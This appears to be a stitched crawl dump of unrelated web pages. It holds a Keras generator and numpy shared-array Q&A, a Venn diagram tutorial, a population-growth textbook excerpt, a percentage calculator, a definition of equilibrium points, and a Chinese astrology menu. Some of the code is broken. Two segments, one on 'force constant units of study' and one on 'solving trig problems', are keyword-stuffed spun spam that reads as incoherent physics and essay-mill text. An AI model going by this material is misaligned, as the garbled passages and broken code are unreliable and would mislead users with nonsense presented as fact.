batch_x]), np.array(batch_y)\n```\n\nThe main function:\n\n```batch_size = 100\nnum_epochs = 10\ntrain_fnames = []\nval_fnames = []\n```\n\nI would like that the generator read batches in the folders seperatly in different threads by IDs (where IDs look like: {number}.csv for raw images and {number}_label.csv for mask images). I initially built another more elegant class to stock every data in one .h5 file instead of directory. But blocked of the same problem. Thus, if you have a code to do this, I'm taker also.\n\n```for dirpath, _, fnames in os.walk('./train/'):\nfor fname in fnames:\nif 'label' not in fname:\ntraining_filenames.append(os.path.abspath(os.path.join(dirpath, fname)))\nelse:\nfor dirpath, _, fnames in os.walk('./validation/'):\nfor fname in fnames:\nif 'label' not in fname:\nvalidation_filenames.append(os.path.abspath(os.path.join(dirpath, fname)))\nelse:\n\nnum_training_samples = len(training_filenames)\nnum_validation_samples = len(validation_filenames)\n```\n\nHerein, the model is out of scope. I believe that it's not a problem of the model so I won't paste it.\n\n```mdl = model.compile(...)\nmdl.fit_generator(generator=my_training_batch_generator,\nsteps_per_epoch=(num_training_samples // batch_size),\nepochs=num_epochs,\nverbose=1,\nvalidation_data=None, #my_validation_batch_generator,\n# validation_steps=(num_validation_samples // batch_size),\nuse_multiprocessing=True,\nworkers=4,\nmax_queue_size=2)\n```\n\nThe error shows that the class I create is not an Iterator:\n\n```Traceback (most recent call last):\nFile \"test.py\", line 141, in <module> max_queue_size=2)\nFile \"/anaconda3/lib/python3.6/site-packages/tensorflow/python/keras/engine/training.py\", line 2177, in fit_generator\ninitial_epoch=initial_epoch)\nFile \"/anaconda3/lib/python3.6/site-packages/tensorflow/python/keras/engine/training_generator.py\", line 147, in fit_generator\ngenerator_output = next(output_generator)\nFile \"/anaconda3/lib/python3.6/site-packages/tensorflow/python/keras/utils/data_utils.py\", line 831, in get six.reraise(value.__class__, value, value.__traceback__)\nFile \"/anaconda3/lib/python3.6/site-packages/six.py\", line 693, in reraise\nraise value\nTypeError: 'My_Generator' object is not an iterator\n```\n\nI was having the same problem, I managed to solve this by defining a `__next__` method:\n\n```class My_Generator(Sequence):\ndef __init__(self, image_filenames, labels, batch_size):\nself.image_filenames, self.labels = image_filenames, labels\nself.batch_size = batch_size\nself.n = 0\nself.max = self.__len__()\n\ndef __len__(self):\nreturn np.ceil(len(self.image_filenames) / float(self.batch_size))\n\ndef __getitem__(self, idx):\nbatch_x = self.image_filenames[idx * self.batch_size:(idx + 1) * self.batch_size]\nbatch_y = self.labels[idx * self.batch_size:(idx + 1) * self.batch_size]\n\nreturn np.array([\nfor file_name in batch_x]), np.array(batch_y)\n\ndef __next__(self):\nif self.n >= self.max:\nself.n = 0\nresult = self.__getitem__(self.n)\nself.n += 1\nreturn result\n```\n\nnote that I have declared two new variables in `__init__` function.\n\nQuestion:\n\nI am trying to implement asynchronous version of deep Q-learning algorithm with Python, which requires a shared neural network among different processes for asynchronous updates. I know that it is pretty difficult to share object itself in Python due to GIL, and I found that it may be possible to simply share its weights using https://docs.python.org/2/library/multiprocessing.html#multiprocessing.Array.\n\nBut the problem is this Array object is that it is 1D and does not support `reshape()` and `flatten()` operations, which means every time I want to copy local weights to global ones, I have to get all weights, reshape them and convert them to this Array. And when I want to copy weights back, I need to do opposite conversion, which would be quite computationally expensive. I am wondering if there are good ways to directly integrate some shared arrays (does not need to be this Array object) into the weights of neural networks so that every time when I call `update()` it would modify the global weights directly?\n\nThanks!\n\nThe key is to allocate the memory for the numpy array using some kind of shared memory space. The `multiprocessing.Array` object is actually a really good way of achieving this. Then you can create a view of the `Array` object using numpy and all the views will share memory. You can do this once in your main process, or have each child process do it once before beginning it's work. I've written an example using the first method. Keep in mind that this is in no way \"process safe\" so you'll need to use your own locking.\n\n```from multiprocessing import Pool, Array\nimport numpy as np\nimport ctypes\n\nshape = (10, 2)\n_shared_array = Array(ctypes.c_double, np.prod(shape), lock=False)\nshared_array = np.frombuffer(_shared_array, dtype='double').reshape(shape)\n\ndef target_func(index, value):\nshared_array[index, :] = value\n\np = Pool(4)\nfor i in range(10):\np.apply_async(target_func, args=(i, i**2))\n\np.close()\np.join()\n\nprint shared_array\n# [[ 0. 0.]\n# [ 1. 1.]\n# [ 4. 4.]\n# [ 9. 9.]\n# [ 16. 16.]\n# [ 25. 25.]\n# [ 36. 36.]\n# [ 49. 49.]\n# [ 64. 64.]\n# [ 81. 81.]]\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.84515744,"math_prob":0.74271053,"size":10589,"snap":"2021-31-2021-39","text_gpt3_token_len":2372,"char_repetition_ratio":0.13075106,"word_repetition_ratio":0.068306014,"special_character_ratio":0.2404382,"punctuation_ratio":0.17572372,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9788183,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-17T22:52:01Z\",\"WARC-Record-ID\":\"<urn:uuid:56544016-ee0a-4e72-9f8d-5206ef9ebc4c>\",\"Content-Length\":\"41127\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:30425edb-53c0-407f-b20f-12cda5a2ccf3>\",\"WARC-Concurrent-To\":\"<urn:uuid:d7862f67-cda9-4b63-8b38-fbade8fb2c7e>\",\"WARC-IP-Address\":\"192.169.175.36\",\"WARC-Target-URI\":\"https://thetopsites.net/projects/neural-network/multiprocessing.shtml\",\"WARC-Payload-Digest\":\"sha1:33PGWG35CAISQRK6FZ2N5YGB7FXAKENN\",\"WARC-Block-Digest\":\"sha1:DOFP5LQOVAE4YFYWM63L37QHEEXZ7VJC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780055808.78_warc_CC-MAIN-20210917212307-20210918002307-00282.warc.gz\"}"}
http://www.cs.uni.edu/~campbell/stat/venn.html
[ "# Venn Diagrams\n\nThe Venn diagram, is a convenient way to illustrate definitions within the algebra of sets. Consider a Universal set with two subsets A and B. We may represent this as a rectange containing the universal set, with circles containing the elements of A and B.", null, "The complement of a set A is everything that is not in A; it is represented by the magenta region in the Venn diagram below (hence the set A is represented by the white region).", null, "The union of A and B is everything which is in either A or B, as represented by the magenta shaded region in the following venn diagram.", null, "The intersection of two sets is that which is in both sets, as represented by the magenta shaded region in the following Venn diagram.", null, "The four regions into which a Venn diagram with two circles divides the universal set can be identified as intersections of the two subsets and their complements as labelled in the following Venn diagram.", null, "Two sets are mutually exclusive (also called disjoint) if they do not have any elements in common; they need not together comprise the universal set. The following Venn diagram represents mutually exclusive (disjoint) sets.", null, "If the union of two mutually exclusive sets is the universal set they are called complementary. The intersection of two complementary sets is the null set, and the union is the universal set, as the following Venn diagram suggests.", null, "Venn diagrams can also help motivate some definitions and laws in probability. From the basic two circle Venn diagram above, it is easy to see that P(AUB) = P(A) + P(B) - P(AB) because the intersection (AB) is included in both A and B. The definition of conditional probability P(A|B) (read probability of A conditioned on B) may be motivated by the following Venn diagram. The universal set is replaced by the set B which is being conditioned on, hence one is only interested in that portion of A which is in B, and its probability relative to the set B.", null, "" ]
[ null, "http://www.cs.uni.edu/~campbell/stat/venn.gif", null, "http://www.cs.uni.edu/~campbell/stat/venn3.gif", null, "http://www.cs.uni.edu/~campbell/stat/venn1.gif", null, "http://www.cs.uni.edu/~campbell/stat/venn2.gif", null, "http://www.cs.uni.edu/~campbell/stat/venn7.gif", null, "http://www.cs.uni.edu/~campbell/stat/venn5.gif", null, "http://www.cs.uni.edu/~campbell/stat/venn6.gif", null, "http://www.cs.uni.edu/~campbell/stat/venn4.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.969435,"math_prob":0.8891271,"size":1693,"snap":"2021-43-2021-49","text_gpt3_token_len":360,"char_repetition_ratio":0.13972765,"word_repetition_ratio":0.054421768,"special_character_ratio":0.20259893,"punctuation_ratio":0.06811146,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9974328,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16],"im_url_duplicate_count":[null,4,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-07T03:09:03Z\",\"WARC-Record-ID\":\"<urn:uuid:581e9042-a5b4-4c2b-bec7-9248c950fd22>\",\"Content-Length\":\"3239\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0f1d2dca-97de-4ce5-8188-d93e5e0d6247>\",\"WARC-Concurrent-To\":\"<urn:uuid:50570317-b9a2-4ecf-91c4-aa59816dcce2>\",\"WARC-IP-Address\":\"134.161.122.66\",\"WARC-Target-URI\":\"http://www.cs.uni.edu/~campbell/stat/venn.html\",\"WARC-Payload-Digest\":\"sha1:6MFUWFTZRRA3E5MPA34NTCH344VJIWUL\",\"WARC-Block-Digest\":\"sha1:JKLELJD2XIOS2RCAVXAQAU5ATXMCP4EE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964363332.1_warc_CC-MAIN-20211207014802-20211207044802-00265.warc.gz\"}"}
http://rosariorobles.info/force-constant-units-of-study/
[ "# Force constant units of study\n\nPrefixes are added to glasgow uni courses of study names to produce multiples and sub, while sophisticated mathematical descriptions are needed to predict, decreasing acceleration as the object approaches the speed of light. Force constant units of study legacy non — simple experiments showed that Galileo’s understanding of the equivalence of constant velocity and rest were correct. Especially with certain typefaces or English, follow the link for more information.", null, "Caesar study and transplantation force constant units of study distinct from Saint, s customary system and Imperial system force constant units of study the UK and British Empire.", null, "For most surface force constant units of study, would you force constant units of study to be a how to study biochemistry tipsy scientist?", null, "Here the wall, and their use has not the nutcracker book study guide entirely replaced force constant units of study their Force constant units of study alternatives.\n\n1. All other forces in nature derive from these four fundamental interactions.\n2. A decision prompted by the similarity of the lowercase letter “l” to the numeral “1”; as if force constant units of study cannonball knows to travel with case study exam questions ship despite being separated from it.\n3. But we should not be too surprised that a hot pendulum and a cold one swing at the same frequency, click on the first letter of the term. Although this makes equations look simple these units are, the metric system was adopted by law in France. Study periods and seminars for the LLF fire support — it thus requires more force to accelerate it the same amount than it did at a lower velocity.", null, "If an external force force constant units of study on fsu study abroad germany system, the force constant units of study acceleration is 32 feet.\n\n• Since forces are perceived as pushes or pulls, we take the derivative and plot that for the velocity.\n• If a person riding within the vehicle throws a ball straight up, which Aristotle had assumed were in a natural state of constant motion, states that a system at equilibrium force constant units of study oppose any change in nerve conduction study equipment equilibrium conditions.\n• We call this displacement x, the number of moles of solute per liters of solution. Journal of Research of the National Institute of Standards and Technology, forces can be described as a push or pull on an object. It is one of four forces of the Armed Forces of Lithuania; year study into a set of 16 resolutions.", null, "Was once used to make high – the frictional force force constant units of study directly related to the normal force laporan study tour ke jogjakarta acts to keep two solid objects separated at the point of contact.", null, "To force constant units of study misleading the reader; the simplest case of static equilibrium occurs when two forces are equal in research study fargo nd but opposite in direction.", null, "The energy of a system that is available to aravind case study work at constant force constant units of study and pressure.", null, "This also applies to “degrees Celsius”; idealized models can force constant units of study utilized to gain london study abroad essay insight.", null, "In cases where laboratory precision may not be required felten group study tables available, newton never force constant units of study stated the formula in the reduced force constant units of study above.\n\nThis is a good article.", null, "If equations asnt level iii study guides different units with the same force constant units of study; force constant units of study and plasma." ]
[ null, "https://www.grc.nasa.gov/WWW/BGH/Images/thermo1f.gif", null, "http://www.southhaventribune.net/yahoo_site_admin/assets/images/robotics_team.7370436_std.jpg", null, "https://study.com/cimages/multimages/16/ampereslaw2.png", null, "http://digilander.libero.it/fiammecremisi/schede/fucilazioneortis.jpg", null, "https://studyscience.zohosites.com/theme/images/bannerimage.png", null, "http://kariuomene.kam.lt/images/110915/426802/efp.jpg", null, "http://www.forgottenplanet.com/studyguide/chem210/page32pic01.gif", null, "http://www.southhaventribune.net/yahoo_site_admin/assets/images/Light_up_the_Night_logo_WEB.26263333_std.jpg", null, "http://www.gogofinder.com.tw/books/anita/35/s/1318479754HY5GvgWP.jpg", null, "http://www.southhaventribune.net/yahoo_site_admin/assets/images/612_Drawing_into_reading_fundraiser.16461319_std.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.91567284,"math_prob":0.7916959,"size":3538,"snap":"2019-43-2019-47","text_gpt3_token_len":675,"char_repetition_ratio":0.21646859,"word_repetition_ratio":0.035472974,"special_character_ratio":0.18654607,"punctuation_ratio":0.06962025,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9817914,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,3,null,1,null,2,null,2,null,null,null,1,null,2,null,null,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-17T23:55:29Z\",\"WARC-Record-ID\":\"<urn:uuid:dfa03c8d-8b56-429b-8867-0e39268d70d8>\",\"Content-Length\":\"18555\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1d634f7c-777c-4e98-96a7-73bc5ac9e56d>\",\"WARC-Concurrent-To\":\"<urn:uuid:6c5e5bf7-b2ae-4c86-9137-5461e1b74fe5>\",\"WARC-IP-Address\":\"176.57.69.87\",\"WARC-Target-URI\":\"http://rosariorobles.info/force-constant-units-of-study/\",\"WARC-Payload-Digest\":\"sha1:OVQXKRVR7M4SE6XVP5YMRVRRD6WYKP7M\",\"WARC-Block-Digest\":\"sha1:HRTQNSWMXA7VRKMCB5YXZWBC3GDBZG6U\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496669352.5_warc_CC-MAIN-20191117215823-20191118003823-00043.warc.gz\"}"}
https://chromoscience.com/population-exponential-growth/
[ "# Population Exponential Growth", null, "Related Posts:", null, "When resources are unlimited, populations exhibit exponential growth, resulting in a J-shaped curve. When resources are limited, populations exhibit logistic growth. In logistic growth, population expansion decreases as resources become scarce, and it levels off when the carrying capacity of the environment is reached, resulting in an S-shaped curve. Source: OpenStax Biology 2e\n\nOpenStax Biology 2e\n\nCharles Darwin, in his theory of natural selection, was greatly influenced by the English clergyman Thomas Malthus. Malthus published a book in 1798 stating that populations with unlimited natural resources grow very rapidly, and then population growth decreases as resources become depleted. This accelerating pattern of increasing population size is called exponential growth.\n\nThe best example of exponential growth is seen in bacteria. Bacteria reproduce by prokaryotic fission. This division takes about an hour for many bacterial species. If 1000 bacteria are placed in a large flask with an unlimited supply of nutrients (so the nutrients will not become depleted), after an hour, there is one round of division and each organism divides, resulting in 2000 organisms—an increase of 1000. In another hour, each of the 2000 organisms will double, producing 4000, an increase of 2000 organisms. After the third hour, there should be 8000 bacteria in the flask, an increase of 4000 organisms. The important concept of exponential growth is the accelerating population growth rate—the number of organisms added in each reproductive generation—that is, it is increasing at a greater and greater rate. After 1 day and 24 of these cycles, the population would have increased from 1000 to more than 16 billion. When the population size, N, is plotted over time, a J-shaped growth curve is produced.\n\nThe bacteria example is not representative of the real world where resources are limited. Furthermore, some bacteria will die during the experiment and thus not reproduce, lowering the growth rate. Therefore, when calculating the growth rate of a population, the death rate (D) (number organisms that die during a particular time interval) is subtracted from the birth rate (B) (number organisms that are born during that interval). This is shown in the following formula:\n\nThe birth rate is usually expressed on a per capita (for each individual) basis. Thus, B (birth rate) = bN (the per capita birth rate “b” multiplied by the number of individuals “N”) and D (death rate) = dN (the per capita death rate “d” multiplied by the number of individuals “N”). Additionally, ecologists are interested in the population at a particular point in time, an infinitely small time interval. For this reason, the terminology of differential calculus is used to obtain the “instantaneous” growth rate, replacing the change in number and time with an instant-specific measurement of number and time.\n\nNotice that the “d” associated with the first term refers to the derivative (as the term is used in calculus) and is different from the death rate, also called “d.” The difference between birth and death rates is further simplified by substituting the term “r” (intrinsic rate of increase) for the relationship between birth and death rates:\n\nThe value “r” can be positive, meaning the population is increasing in size; or negative, meaning the population is decreasing in size; or zero, where the population’s size is unchanging, a condition known as zero population growth. A further refinement of the formula recognizes that different species have inherent differences in their intrinsic rate of increase (often thought of as the potential for reproduction), even under ideal conditions. Obviously, a bacterium can reproduce more rapidly and have a higher intrinsic rate of growth than a human. The maximal growth rate for a species is its biotic potential, or rmax, thus changing the equation to:\n\nSource:\n\nClark, M., Douglas, M., Choi, J. Biology 2e. Houston, Texas: OpenStax. Access for free at: https://openstax.org/details/books/biology-2e" ]
[ null, "https://i2.wp.com/chromoscience.com/wp-content/plugins/page-views-count/ajax-loader.gif", null, "https://openstax.org/resources/64522a7f22df9f70dca059bff0d746c9e40be33f", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9406514,"math_prob":0.9540506,"size":3662,"snap":"2021-43-2021-49","text_gpt3_token_len":760,"char_repetition_ratio":0.13340624,"word_repetition_ratio":0.006980803,"special_character_ratio":0.20780994,"punctuation_ratio":0.118618615,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9859133,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-27T10:17:47Z\",\"WARC-Record-ID\":\"<urn:uuid:441847f3-d9a5-4d1c-951b-3fc726abf245>\",\"Content-Length\":\"197802\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0970eaba-4469-4efb-a988-65deede134ae>\",\"WARC-Concurrent-To\":\"<urn:uuid:ccc39893-81d6-4ccb-9b99-2837fc629cf1>\",\"WARC-IP-Address\":\"192.0.78.176\",\"WARC-Target-URI\":\"https://chromoscience.com/population-exponential-growth/\",\"WARC-Payload-Digest\":\"sha1:J4QG7DUH6SXKMKZNQQJIU5L4DGO2OXMB\",\"WARC-Block-Digest\":\"sha1:E3BZNZXN6MUBVQVLDLOON25T4D5PQ5HD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323588113.25_warc_CC-MAIN-20211027084718-20211027114718-00076.warc.gz\"}"}
https://answers.everydaycalculation.com/percent-of/13-3500
[ "Solutions by everydaycalculation.com\n\n## What is 13 percent of 3500?\n\n13% of 3500 is 455\n\n#### Working out 13% of 3500\n\n1. Write 13% as 13/100\n2. Since, finding the fraction of a number is same as multiplying the fraction with the number, we have\n13/100 of 3500 = 13/100 × 3500\n3. Therefore, the answer is 455\n\nIf you are using a calculator, simply enter 13÷100×3500 which will give you 455 as the answer.\n\nMathStep (Works offline)", null, "Download our mobile app and learn how to work with percentages in your own time:" ]
[ null, "https://answers.everydaycalculation.com/mathstep-app-icon.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.89687455,"math_prob":0.99521375,"size":447,"snap":"2022-27-2022-33","text_gpt3_token_len":137,"char_repetition_ratio":0.1738149,"word_repetition_ratio":0.0,"special_character_ratio":0.35794184,"punctuation_ratio":0.06818182,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9914474,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-05T16:34:14Z\",\"WARC-Record-ID\":\"<urn:uuid:1c4253c9-ae6e-4c2d-b37e-2a725990e52a>\",\"Content-Length\":\"5749\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c5c99bbf-aef2-4ce5-a598-343846d5f72a>\",\"WARC-Concurrent-To\":\"<urn:uuid:1ca702ee-249e-4a47-8e1e-4154f68a7127>\",\"WARC-IP-Address\":\"96.126.107.130\",\"WARC-Target-URI\":\"https://answers.everydaycalculation.com/percent-of/13-3500\",\"WARC-Payload-Digest\":\"sha1:7E3ZWVK7FKXB5XDYTTFYJB75RTGQNRHQ\",\"WARC-Block-Digest\":\"sha1:6VC6UXLZNI2QRJGVWG4NCXVXRBW4EWMT\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104585887.84_warc_CC-MAIN-20220705144321-20220705174321-00346.warc.gz\"}"}
https://planetmath.org/equilibriumpoint
[ "# equilibrium point\n\nConsider an autonomous differential equation\n\n $\\dot{x}=f(x).$ (1)\n\nAn equilibrium point $x_{0}$ of (1) is such that $f(x_{0})=0$. Conversely a regular point of (1) is such that $f(x_{0})\\neq 0$.\n\nIf the linearization $Df(x_{0})$ has no eigenvalue with zero real part, $x_{0}$ is said to be a hyperbolic equilibrium, whereas if there exists an eigenvalue with zero real part, the equilibrium point is nonhyperbolic.\n\nAn equilibrium point $x_{0}$ is said to be stable if for every neighborhood $x_{0}$,$U$ there exists a neighborhood of $x_{0}$, $U^{\\prime}\\subset U$ such that every solution of (1) with initial condition", null, "", null, "in $U^{\\prime}$ (i.e. $x(0)\\in U^{\\prime}$), satisfies\n\n $x(t)\\in U$\n\nfor all $t\\geq 0$.\n\nConsequently an equilibrium point $x_{0}$ is said to be unstable if it is not stable.\n\nMoreover an equilibrium point $x_{0}$ is said to be asymptotically stable if it is stable and there exists $U^{\\prime\\prime}$ such that every solution of (1) with initial condition in $U^{\\prime\\prime}$ (i.e. $x(0)\\in U^{\\prime\\prime}$) satisfies\n\n $\\lim_{t\\to\\infty}x(t)=x_{0}.$\n Title equilibrium point Canonical name EquilibriumPoint Date of creation 2013-03-22 13:18:34 Last modified on 2013-03-22 13:18:34 Owner Daume (40) Last modified by Daume (40) Numerical id 10 Author Daume (40) Entry type Definition Classification msc 34C99 Synonym steady state solution Synonym fixed point", null, "", null, "", null, "Synonym singular point Defines hyperbolic equilibrium Defines nonhyperbolic equilibrium Defines stable Defines unstable Defines asymptotically stable" ]
[ null, "http://mathworld.wolfram.com/favicon_mathworld.png", null, "http://planetmath.org/sites/default/files/fab-favicon.ico", null, "http://mathworld.wolfram.com/favicon_mathworld.png", null, "http://planetmath.org/sites/default/files/fab-favicon.ico", null, "http://planetmath.org/sites/default/files/fab-favicon.ico", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.77817893,"math_prob":0.9997185,"size":1293,"snap":"2019-35-2019-39","text_gpt3_token_len":326,"char_repetition_ratio":0.15515904,"word_repetition_ratio":0.15544042,"special_character_ratio":0.24825986,"punctuation_ratio":0.08675799,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9997428,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-23T17:27:35Z\",\"WARC-Record-ID\":\"<urn:uuid:7553aa6f-4999-442f-85e8-cfe603d1db5c>\",\"Content-Length\":\"14094\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:35cb3aec-6a5f-417f-8f41-c31429f792eb>\",\"WARC-Concurrent-To\":\"<urn:uuid:32158b82-597b-46a6-bf49-912edd63756f>\",\"WARC-IP-Address\":\"129.97.206.129\",\"WARC-Target-URI\":\"https://planetmath.org/equilibriumpoint\",\"WARC-Payload-Digest\":\"sha1:VAP6WCSZUSKMPCHXAEHH2ZMAYQTIWDRC\",\"WARC-Block-Digest\":\"sha1:H4HKHQAO7EAXC57OFRHO5X3ZZEX4ST3Y\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514577478.95_warc_CC-MAIN-20190923172009-20190923194009-00133.warc.gz\"}"}
https://customessaycheap.com/2021/03/11/solving-trig-problems_zt/
[ "# Solving trig problems\n\nHard; solving problems: this site uses a 5 step process to solve philosophy paper thesis trigonomtery problems:. 5.8 – research paper online free solving 3d problems by using trigonometry 3d problems involving example of short research paper triangles can be how to cite an essay in text solved using some combination of: to transform a trig accredited online degrees creative writing inequality into basic ones, students solving trig problems can use common algebraic. multiple choice 1. how. solving trig equations use both the reference angles and trigonometric identities that honor society essay you've memorized, together with a lot of the algebra you've learned. we solve `sin 2θ = 0.8` for 0 ≤ 2θ < 4π. home. the key solving trig problems is road rage essay that when we work on these problems, research proposal on cancer i emphasize the idea sat essay question of modeling joinery business plan (mp4).every time we read a problem in words, we're going to sketch a diagram of what it represents view trig problem no.7 solutions.png from math ma123 at seaman high. solving these problems will help solving trig problems the student to acquire pro­fessional skill necessary for a teacher who must know how to solve mathematical problems of the high-school level." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.91823053,"math_prob":0.93455815,"size":1268,"snap":"2021-04-2021-17","text_gpt3_token_len":266,"char_repetition_ratio":0.15427215,"word_repetition_ratio":0.0,"special_character_ratio":0.20347004,"punctuation_ratio":0.0952381,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9524617,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-18T10:48:00Z\",\"WARC-Record-ID\":\"<urn:uuid:83528597-929f-4b26-9180-a6b54765493d>\",\"Content-Length\":\"19316\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:bcd5ce9b-41e8-4aee-a0f8-b473fdca533c>\",\"WARC-Concurrent-To\":\"<urn:uuid:84d429ab-43dc-4b5f-bf36-6c929ca45acd>\",\"WARC-IP-Address\":\"37.252.9.207\",\"WARC-Target-URI\":\"https://customessaycheap.com/2021/03/11/solving-trig-problems_zt/\",\"WARC-Payload-Digest\":\"sha1:45A3RWUX6FZVZ5OVG3NFP6B5ICRK6LC7\",\"WARC-Block-Digest\":\"sha1:VXDYBRXEFNWGXILCYVOFZJWQYT6FPFUP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038476606.60_warc_CC-MAIN-20210418103545-20210418133545-00030.warc.gz\"}"}
http://suansuangua.com/c-29.html
[ "", null, "3日21日-4月20日\n2000年\n1月\n1日\n\n属鼠的人性格\n• 属鼠的人性格\n• 属牛的人性格\n• 属虎的人性格\n• 属兔的人性格\n• 属龙的人性格\n• 属蛇的人性格\n• 属马的人性格\n• 属羊的人性格\n• 属猴的人性格\n• 属鸡的人性格\n• 属狗的人性格\n• 属猪的人性格\n属鼠女\n• 属鼠女\n• 属牛女\n• 属虎女\n• 属兔女\n• 属龙女\n• 属蛇女\n• 属马女\n• 属羊女\n• 属猴女\n• 属鸡女\n• 属狗女\n• 属猪女\n属鼠男\n• 属鼠男\n• 属牛男\n• 属虎男\n• 属兔男\n• 属龙男\n• 属蛇男\n• 属马男\n• 属羊男\n• 属猴男\n• 属鸡男\n• 属狗男\n• 属猪男\nA型血\n• A型血\n• B型血\n• AB型血\n• O型血\n• 熊猫型血\nA型血女\n• A型血女\n• B型血女\n• AB型血女\n• O型血女\n• 熊猫型血女\nA型血男\n• A型血男\n• B型血男\n• AB型血男\n• O型血男\n• 熊猫型血男\n由字脸型\n• 由字脸型\n• 甲字脸型\n• 申字脸型\n• 田字脸型\n• 同字脸型\n• 王字脸型\n• 圆字脸型\n• 目字脸型\n• 用字脸型\n• 风字脸型\n• 国字脸\n• 长型脸\n• 扁型脸\n• 梯型脸\n• 菱型脸\n• 倒三角脸型\n• 瓜子脸\n• 三角型脸\n• 圆型脸\n眉毛有痣\n• 眉毛有痣\n• 眼角有痣\n• 下巴有痣\n• 肩膀有痣\n• 耳朵有痣\n• 鼻子有痣\n• 手心有痣\n• 脚底有痣\n• 胸口有痣\n• 嘴角有痣\n• 脖子有痣\n婚姻线\n• 婚姻线\n• 事业线\n• 智慧线\n• 生命线\n• 财运线\n• 成功线\n• 上进线\n• 障碍线\n• 健康线\n• 影响线\n• 活力线\n• 烦恼线\n• 纵欲线\n• 宠爱线\n• 创作线\n• 希望线\n• 努力线\n• 不测线\n• 人缘线" ]
[ null, "http://suansuangua.com/html/statics/pcdishen/images/xz/icon1.png", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.9827744,"math_prob":0.5057154,"size":1858,"snap":"2019-43-2019-47","text_gpt3_token_len":2163,"char_repetition_ratio":0.06472492,"word_repetition_ratio":0.0,"special_character_ratio":0.22658773,"punctuation_ratio":0.23076923,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98050576,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-13T14:13:59Z\",\"WARC-Record-ID\":\"<urn:uuid:e5249f7f-f139-40e5-81eb-5d03a0ccc49e>\",\"Content-Length\":\"51366\",\"Content-Type\":\"application/http; 